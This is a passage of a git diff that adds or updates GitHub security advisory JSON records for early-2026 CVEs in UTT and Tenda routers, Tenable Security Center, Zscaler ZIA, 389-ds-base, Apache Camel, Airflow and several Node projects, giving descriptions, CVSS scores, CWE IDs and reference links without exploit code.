index 0000000000000..c257834cedbb0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4w36-hgqj-cjp2/GHSA-4w36-hgqj-cjp2.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4w36-hgqj-cjp2", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2026-3016" + ], + "details": "A vulnerability was identified in UTT HiPER 810G up to 1.7.7-171114. The affected element is the function strcpy of the file /goform/formP2PLimitConfig. The manipulation of the argument except leads to buffer overflow. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3016" + }, + { + "type": "WEB", + "url": "https://github.com/xhsy0314/CVEReport/blob/main/UTT-2/README.md" + }, + { + "type": "WEB", + "url": "https://github.com/xhsy0314/CVEReport/blob/main/UTT-2/README.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347376" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347376" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756249" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T16:29:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-62pw-p3ph-rgh9/GHSA-62pw-p3ph-rgh9.json b/advisories/unreviewed/2026/02/GHSA-62pw-p3ph-rgh9/GHSA-62pw-p3ph-rgh9.json new file mode 100644 index 0000000000000..6068f41d6106d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-62pw-p3ph-rgh9/GHSA-62pw-p3ph-rgh9.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-62pw-p3ph-rgh9", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2026-27512" + ], + "details": "Shenzhen Tenda F3 Wireless Router firmware V12.01.01.55_multi contains a content-type confusion vulnerability in the administrative interface. Responses omit the X-Content-Type-Options: nosniff header and include attacker-influenced content that can be reflected into the response body. Under affected browser behaviors, MIME sniffing may cause the response to be interpreted as active HTML, enabling script execution in the context of the administrative interface.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27512" + }, + { + "type": "WEB", + "url": "https://www.tendacn.com/product/F3" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/tenda-f3-reflected-script-execution-via-missing-nosniff-header" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T17:23:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-663h-2vr3-ghrj/GHSA-663h-2vr3-ghrj.json b/advisories/unreviewed/2026/02/GHSA-663h-2vr3-ghrj/GHSA-663h-2vr3-ghrj.json new file mode 100644 index 0000000000000..b29c06c367f74 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-663h-2vr3-ghrj/GHSA-663h-2vr3-ghrj.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-663h-2vr3-ghrj", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2025-70058" + ], + "details": "An issue pertaining to CWE-295: Improper Certificate Validation was discovered in YMFE yapi v1.12.0. The application disables TLS/SSL certificate validation by setting 'rejectUnauthorized': false in the HTTPS agent configuration for Axios requests", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70058" + }, + { + "type": "WEB", + "url": "https://gist.github.com/zcxlighthouse/11c53803faf23f607c2787c166e811d4" + }, + { + "type": "WEB", + "url": "https://github.com/YMFE" + }, + { + "type": "WEB", + "url": "https://github.com/YMFE/yapi" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T16:29:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6pjc-995p-mh58/GHSA-6pjc-995p-mh58.json b/advisories/unreviewed/2026/02/GHSA-6pjc-995p-mh58/GHSA-6pjc-995p-mh58.json new file mode 100644 index 0000000000000..c8a980906014f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6pjc-995p-mh58/GHSA-6pjc-995p-mh58.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6pjc-995p-mh58", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2026-2697" + ], + "details": "An Indirect Object Reference (IDOR) in Security Center allows an authenticated remote attacker to escalate privileges via the 'owner' parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2697" + }, + { + "type": "WEB", + "url": "https://www.tenable.com/security/tns-2026-07" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T16:29:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json b/advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json new file mode 100644 index 0000000000000..091aa4689286b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-744p-mq95-2m92", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2026-26464" + ], + "details": "Stored Cross-Site Scripting (XSS) was found in the /admin/edit_user.php page of Society Management System Portal V1.0, which allows remote attackers to inject and store arbitrary JavaScript code that is executed in users' browsers. This vulnerability can be exploited via the name parameter in a POST HTTP request, leading to execution of malicious scripts when the affected content is viewed by other users, including administrators.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26464" + }, + { + "type": "WEB", + "url": "https://github.com/0xBhushan/Writeups/blob/main/CVE/Kashipara/Society%20Management%20System%20Portal/Stored%20XSS-name.pdf" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T18:25:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9hjg-4h75-mvc5/GHSA-9hjg-4h75-mvc5.json b/advisories/unreviewed/2026/02/GHSA-9hjg-4h75-mvc5/GHSA-9hjg-4h75-mvc5.json new file mode 100644 index 0000000000000..91a0ceee4c2ea --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9hjg-4h75-mvc5/GHSA-9hjg-4h75-mvc5.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9hjg-4h75-mvc5", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2026-27513" + ], + "details": "Shenzhen Tenda F3 Wireless Router firmware V12.01.01.55_multi contains a cross-site request forgery (CSRF) vulnerability in the web-based administrative interface. The interface does not implement anti-CSRF protections, allowing an attacker to induce an authenticated administrator to submit state-changing requests, which can result in unauthorized configuration changes.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27513" + }, + { + "type": "WEB", + "url": "https://www.tendacn.com/product/F3" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/tenda-f3-csrf-in-web-management-interface" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T17:23:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json b/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json index aff0817b94c65..381a0419c86d3 100644 --- a/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json +++ b/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-c3f3-cc42-xr9v", - "modified": "2026-02-23T12:31:29Z", + "modified": "2026-02-23T18:32:01Z", "published": "2026-02-23T09:31:23Z", "aliases": [ "CVE-2026-23552" ], "details": "Cross-Realm Token Acceptance Bypass in KeycloakSecurityPolicy Apache Camel Keycloak component. \n\nThe Camel-Keycloak KeycloakSecurityPolicy does not validate the iss (issuer) claim of JWT tokens against the configured realm. A token issued by one Keycloak realm is silently accepted by a policy configured for a completely different realm, breaking tenant isolation.\nThis issue affects Apache Camel: from 4.15.0 before 4.18.0.\n\nUsers are recommended to upgrade to version 4.18.0, which fixes the issue.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -31,7 +36,7 @@ "cwe_ids": [ "CWE-346" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-23T09:17:00Z" diff --git a/advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json b/advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json index 573b55331f43f..cfbd574a16668 100644 --- a/advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json +++ b/advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-gfw7-2v73-69wg", - "modified": "2026-02-21T03:31:39Z", + "modified": "2026-02-23T18:32:01Z", "published": "2026-02-21T03:31:39Z", "aliases": [ "CVE-2025-65995" ], "details": "When a DAG failed during parsing, Airflow’s error-reporting in the UI could include the full kwargs passed to the operators. If those kwargs contained sensitive values (such as secrets), they might be exposed in the UI tracebacks to authenticated users who had permission to view that DAG. \n\nThe issue has been fixed in Airflow 3.1.4 and 2.11.1, and users are strongly advised to upgrade to prevent potential disclosure of sensitive information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -35,7 +40,7 @@ "cwe_ids": [ "CWE-209" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-21T03:15:57Z" diff --git a/advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json b/advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json new file mode 100644 index 0000000000000..7be7206499ed6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h2mx-ppvp-v2rq", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2025-70045" + ], + "details": "An issue pertaining to CWE-295: Improper Certificate Validation was discovered in jxcore jxm master. The application disables TLS/SSL certificate validation by setting 'rejectUnauthorized': false in HTTPS request options when 'jx_obj.IsSecure' is true", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70045" + }, + { + "type": "WEB", + "url": "https://gist.github.com/zcxlighthouse/bd5852a409c97438016f2c476f8461d9" + }, + { + "type": "WEB", + "url": "https://github.com/jxcore" + }, + { + "type": "WEB", + "url": "https://github.com/jxcore/jxm" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T16:29:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jqx8-f6x9-hm34/GHSA-jqx8-f6x9-hm34.json b/advisories/unreviewed/2026/02/GHSA-jqx8-f6x9-hm34/GHSA-jqx8-f6x9-hm34.json new file mode 100644 index 0000000000000..0ef084e5339c9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jqx8-f6x9-hm34/GHSA-jqx8-f6x9-hm34.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jqx8-f6x9-hm34", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2026-27514" + ], + "details": "Shenzhen Tenda F3 Wireless Router firmware V12.01.01.55_multi contains a sensitive information exposure vulnerability in the configuration download functionality. The configuration download response includes the router password and administrative password in plaintext. The endpoint also omits appropriate Cache-Control directives, which can allow the response to be stored in client-side caches and recovered by other local users or processes with access to cached browser data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27514" + }, + { + "type": "WEB", + "url": "https://www.tendacn.com/product/F3" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/tenda-f3-plaintext-credential-exposure-in-configuration-download" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-201" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T17:23:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m575-4pr9-x5xr/GHSA-m575-4pr9-x5xr.json b/advisories/unreviewed/2026/02/GHSA-m575-4pr9-x5xr/GHSA-m575-4pr9-x5xr.json new file mode 100644 index 0000000000000..ff72c80d8db22 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m575-4pr9-x5xr/GHSA-m575-4pr9-x5xr.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m575-4pr9-x5xr", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2025-70044" + ], + "details": "An issue pertaining to CWE-295: Improper Certificate Validation was discovered in fofolee uTools-quickcommand 5.0.3.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70044" + }, + { + "type": "WEB", + "url": "https://gist.github.com/zcxlighthouse/c00a0eef8ac41ec15ec43b75e2a2f7f8" + }, + { + "type": "WEB", + "url": "https://github.com/fofolee" + }, + { + "type": "WEB", + "url": "https://github.com/fofolee/uTools-quickcommand" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T16:29:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mv94-7vf6-c5q6/GHSA-mv94-7vf6-c5q6.json b/advisories/unreviewed/2026/02/GHSA-mv94-7vf6-c5q6/GHSA-mv94-7vf6-c5q6.json new file mode 100644 index 0000000000000..a41735bb7582a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mv94-7vf6-c5q6/GHSA-mv94-7vf6-c5q6.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mv94-7vf6-c5q6", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2026-3015" + ], + "details": "A vulnerability was determined in UTT HiPER 810G up to 1.7.7-171114. Impacted is the function strcpy of the file /goform/formPolicyRouteConf. Executing a manipulation of the argument GroupName can lead to buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3015" + }, + { + "type": "WEB", + "url": "https://github.com/xhsy0314/CVEReport/blob/main/UTT-1/README.md" + }, + { + "type": "WEB", + "url": "https://github.com/xhsy0314/CVEReport/blob/main/UTT-1/README.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347375" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347375" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756248" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T16:29:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p76h-f4cx-3273/GHSA-p76h-f4cx-3273.json b/advisories/unreviewed/2026/02/GHSA-p76h-f4cx-3273/GHSA-p76h-f4cx-3273.json new file mode 100644 index 0000000000000..53011e62a0d93 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p76h-f4cx-3273/GHSA-p76h-f4cx-3273.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p76h-f4cx-3273", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2026-22568" + ], + "details": "Improper neutralization of special elements in user-supplied input within the ZIA Admin UI could allow an authenticated administrator to access or retrieve unauthorized internal information in rare conditions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22568" + }, + { + "type": "WEB", + "url": "https://help.zscaler.com/zia/release-upgrade-summary-2026?applicable_category=zscaler.net&deployment_date=2026-02-12&id=1538576" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T17:23:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pj4q-4jcg-hp2c/GHSA-pj4q-4jcg-hp2c.json b/advisories/unreviewed/2026/02/GHSA-pj4q-4jcg-hp2c/GHSA-pj4q-4jcg-hp2c.json new file mode 100644 index 0000000000000..a39367ba49290 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pj4q-4jcg-hp2c/GHSA-pj4q-4jcg-hp2c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pj4q-4jcg-hp2c", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2026-22567" + ], + "details": "Improper validation of user-supplied input in the ZIA Admin UI could allow an authenticated administrator to initiate backend functions through specific input fields in limited scenarios.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22567" + }, + { + "type": "WEB", + "url": "https://help.zscaler.com/zia/release-upgrade-summary-2025?applicable_category=zscalertwo.net&deployment_date=2025-12-17&id=1538575" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T17:23:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json b/advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json new file mode 100644 index 0000000000000..63bddd81d06bb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q4hc-vp2m-fr47", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2025-14905" + ], + "details": "A flaw was found in the 389-ds-base server. A heap buffer overflow vulnerability exists in the `schema_attr_enum_callback` function within the `schema.c` file. This occurs because the code incorrectly calculates the buffer size by summing alias string lengths without accounting for additional formatting characters. When a large number of aliases are processed, this oversight can lead to a heap overflow, potentially allowing a remote attacker to cause a Denial of Service (DoS) or achieve Remote Code Execution (RCE).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14905" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-14905" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2423624" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T16:29:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q6w4-grhv-wcp8/GHSA-q6w4-grhv-wcp8.json b/advisories/unreviewed/2026/02/GHSA-q6w4-grhv-wcp8/GHSA-q6w4-grhv-wcp8.json new file mode 100644 index 0000000000000..44ccf0d02e7a2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q6w4-grhv-wcp8/GHSA-q6w4-grhv-wcp8.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6w4-grhv-wcp8", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2026-27511" + ], + "details": "Shenzhen Tenda F3 Wireless Router firmware V12.01.01.55_multi contains a clickjacking vulnerability in the web-based administrative interface. The interface does not set the X-Frame-Options header, allowing attacker-controlled sites to embed administrative pages in an iframe and trick an authenticated administrator into unintended interactions that may result in unauthorized configuration changes.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27511" + }, + { + "type": "WEB", + "url": "https://www.tendacn.com/product/F3" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/tenda-f3-clickjacking-in-web-management-interface" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1021" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T17:23:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vm54-j482-hx4h/GHSA-vm54-j482-hx4h.json b/advisories/unreviewed/2026/02/GHSA-vm54-j482-hx4h/GHSA-vm54-j482-hx4h.json new file mode 100644 index 0000000000000..b5eede67eceee --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vm54-j482-hx4h/GHSA-vm54-j482-hx4h.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vm54-j482-hx4h", + "modified": "2026-02-23T18:32:02Z", + "published": "2026-02-23T18:32:02Z", + "aliases": [ + "CVE-2026-2698" + ], + "details": "An improper access control vulnerability exists where an authenticated user could access areas outside of their authorized scope.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2698" + }, + { + "type": "WEB", + "url": "https://https://docs.tenable.com/release-notes/Content/security-center/2026.htm" + }, + { + "type": "WEB", + "url": "https://https://www.tenable.com/security/tns-2026-07" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T17:23:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json b/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json index 8530d1187e7be..5756ac5f3acba 100644 --- a/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json +++ b/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xfxx-38qx-mrf4", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-23T18:31:56Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22357" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') 